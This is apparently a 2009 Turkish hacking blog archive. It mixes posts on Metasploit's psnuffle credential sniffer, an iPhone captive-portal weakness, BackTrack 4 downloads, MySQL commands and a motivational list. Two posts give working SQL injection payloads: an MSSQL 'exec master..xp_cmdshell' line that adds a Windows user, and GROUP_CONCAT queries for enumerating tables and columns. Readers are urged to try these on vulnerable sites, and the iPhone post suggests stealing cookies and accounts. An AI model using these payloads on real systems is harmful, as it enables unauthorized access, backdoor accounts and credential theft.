11 Eylül 2009 Cuma

MsSQL Injection ~ CmdShell Çalıştırma

MsSQL Injection yaparken uzaktan cmdshell çalıştırabiliyoruz.Şu komut ile cmdshelli çalıştırabilmekteyiz.

;exec master..xp_cmdshell ’’--

’’ bıraktıgım yer size kalan komutların kullanacagınız yer.

mesela en basitinden ’’ şu kısımın arasına bizim o meşhur MS SQL
password ve user oluşturma komutumuzu kullanabiliriz.

’net user /add Energyzer Energyzer7’

Tamamlayacak olursak

;exec master..xp_cmdshell ’net user / add Energyzer Energyzer7’--

10 Eylül 2009 Perşembe

Psnuffle password sniffer for metasploit


I submitted a new version of the psnuffle credential sniffer addon to the metasploit team. Until HDM has reviewed it and merged it into the svn i uploaded a tgz to remote-exploit.org's code section http://www.remote-exploit.org/codes/psnuffle/psnuffle_rexploit_org_09082009.tar.gz Please note that it will be removed when its officially available within the metasploit svn. Checkout the demo video http://vimeo.com/6013518 if you like to see it in action. Currently i included pop3, imap, ftp and a HTTP Get sniffer module. Modules are very simple to code, so i expect new ones every few days.


Psnuffle credentials sniffing module demo from Max Moser on Vimeo.

With psnuffle metasploit got a credential sniffer in place. Its easy to use and extens. Writing a new module just takes some minutes.

Not: Türkçeye çeviricem...

iUsability-Pwned!



Lothar informed me about a strange behaviour of the iPhone running OS 3. It seems like the iPhone is automatically opening a browser when joining a network. (See video of the whole probleme here: http://www.vimeo.com/5466236)

The iPhone tries to do the following:

1. DNS querries for www.apple.com
2. Opening http://www.apple.com/library/test/success.html

When both are successful, then fine... the phone gets back "success" and everything is ok.
When both are failing... thats fine as well because then the phone assumes that the internet connection is not up and running.

BUT <-- isn't there always a BUT?! If the phone can succcessfully querry the name but get back any different content than "Success" it assumes that there is a captive portal which requires you to authenticate first to get access to the internet. This is true for many hotspots etc... so Apple was thinking.. damn thats annoying for the user... lets open up Safari automatically if this special case comes into place :-) Usability kills security .... together with karmetasploit its a very evil thing. Get Iphones cookies, accounts and maybe even system control... depending on the bugs you have left to test. You can see the whole thing as a video @vimeo http://www.vimeo.com/5466236 .... now lets find some new safari bugs :-)

And thank you lothar for the fish.

Not: Türkçeye çevirisini yapıcam...

9 Eylül 2009 Çarşamba

Backtrack 4 Beta ve Final çıktı


Backtrack 4 beta çıktı. En belirgin özelliklerden biri Pentest Live CD den tam bir dağıtıma geçmeleri.

Debian core paketlerine dayalı ve Ubuntu yazılım depolarını kullanan Backtrack kolayca güncellenebilecek. Senkronize edilerek yeni çıkan güvenlik araçlarına güncellenebilecek.

DVD imajı:
İndirmek için: http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
Boyutu: 854 MB
MD5: 7d1eb7f4748759e9735fee1b8a17c1d8

VMware imajı:
İndirmek için: http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-vm
Boyutu: 1 GB
MD5: MD5: 38acdcbaf6c73d7c55180dfea8641e5d

Final için

DVD imajı:
İndirmek için: http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
Boyutu: 1390 MB
MD5: b0485da6194d75b30cda282ceb629654

Yeni özelliklerden bazıları:
* Daha iyi donanım desteği ile Kernel 2.6.28.1
* Pico e12 ve e16 kartları doğal desteği artık tam olarak çalışıyor, bu da Backtrack'i bu müthiş minik makinaları tam olarak kullanan ilk sızma testi dağıtımı yapıyor.
* PXE Boot desteği - PXE destekli kartlar ile BackTrack'i ağdan boot edin!
* SAINT EXPLOIT - SAINT firması tarafından sınırlı sayıda IP ile kullanıcılarımıza sağlandı
* MALTEGO - Paterva'dakiler Maltego 2.0.2 ile müthiş bir iş yaptılar - community edition sürümü Backtrack'te bulunuyor.
* rt18187 injection hız artırmaları için çeşitli özel yamalarla birlikte en son mac80211 wireless injection yamaları uygulandı. Wireless injection desteği hiç bu kadar geniş ve fonksiyonel olmamıştı.
* Unicornscan - postgres loglama desteği ve bir web arayüzü ile tam olarak çalışıyor.
* RFID desteği
* Pyrit CUDA desteği...
* Yeni ve güncellenen araçlar - listenin sonu yok!

http://www.remote-exploit.org/backtrack_download.html

27 Ağustos 2009 Perşembe

Mysql Komutları

SQL Server üzerinde bir veritabanı oluşturun
mysql> create database [databasename];

SQL Server üzerinde tüm veritabanlarının listesi
mysql> show databases;

Veritabanı tüm tabloları görebilirsiniz
mysql> show tables;

Bir veritabanını silmek için
mysql> drop database [database name];

Bir tablo silmek için
mysql> drop table [table name];

Bir tablodaki tüm verileri gösterir
mysql> SELECT * FROM [table name];

Sum column.
mysql> SELECT SUM(*) FROM [table name];

Yeni bir kullanıcı oluşturma. Login root olarak. MySQL db geçin. Kullanıcı olun. Güncelleme privs.
# mysql -u root -p
mysql> use mysql;
mysql> INSERT INTO user (Host,User,Password) VALUES('%','username',PASSWORD('password'));
mysql> flush privileges;


UNIX shellde bir kullanıcı şifresini değiştirin.
# [mysql dir]/bin/mysqladmin -u username -h hostname.blah.org -p password 'new-password'

Root şifresini güncelleyin
# mysqladmin -u root -p oldpassword newpassword

Bir kolon silin
mysql> alter table [table name] drop column [column name];

Veritabanına yeni bir kolon ekleyin
mysql> alter table [table name] add column [new column name] varchar (20);

Kolon adını değiştirin
mysql> alter table [table name] change [old column name] [new column name] varchar (50);

Komutlara kaldığım yerden devam edicem......

GROUP_CONCAT MySQL SQL Injection

Yeni Mysql Injection teknigi . Pratik için deneme yapabilirsiniz arkadaslar mesela Sql açigi olan bir siteye bu kodu uygulayarak baslayabilirsiniz ; SELECT CONCAT(TABLO_ADI,’>’,GROUP_CONCAT(KOLON_ADI)) FROM information_schema.columns …

SELECT CONCAT(table_name,’>’,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1

SELECT CONCAT(table_name,’>’,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 2,1

SELECT CONCAT(table_name,’>’,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 3,1
SELECT CONCAT(table_name,’>’,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT n,1

Yaşama Anlam Ve Boyut Katan İki şeyin önemi

İki şey "Kalitesiz İnsan" ın özelliğidir :
1- Şikayetçilik
2- Dedikodu
İki şey çözümsüz görünen problemleri bile çözer :
1- Bakış açısını değiştirmek
2- Karşındakinin yerine kendini koyabilmek
İki şey yanlış yapmanı engeller :
1 - Şahıs ve olayları akıl ve kalp süzgecinden geçirmek
2- Hak yememek

İki şey kişiyi gözden düşürür :
1- Demagoji (Laf kalabalıklığı)
2- Kendini ağıra satmak (övmek, vazgeçilmez göstermek)

İki şey insanı "Nitelikli İnsan" yapar :
1- İradeye Hakim Olmak
2- Uyumlu Olmak
İki şey "Ekstra Değer" katar :
1- Hitabet ve diksiyon eğitimi almak
2- Anlayarak hızlı okumayı öğrenmek
İki şey geri bırakır :
1- Kararsızlık
2- Cesaretsizlik
İki şey ömür boyu boşa kürek çekmemeni sağlar :
1- Baskın yeteneği bulmak
2- Sevdiğin işi yapmak
İki şey başarının sırrıdır :
1- Ustalardan ustalığı öğrenmek
2- Kendini güncellemek
İki şey başarıyı mutlulukla beraber yakalamanın sırrıdır :
1- Niyetin saf olması
2- Ruhsal farkındalık
İki şey milyonlarca insandan ayırır :
1- Sorunun değil, çözümün parçası olmak
2- Hayata ve herşeye yeni (özgün, orijinal, farklı) bakış açısıyla yaklaşabilmek
İki şey gelişmeyi engeller :
1- Aşırılık (mübaġla, abartı, ifrat, tefrit)
2- Felakete odaklanmış olmak
İki şey çözüm getirir :
1- Tebessüm (gülümseme)
2- Sükut (susmak)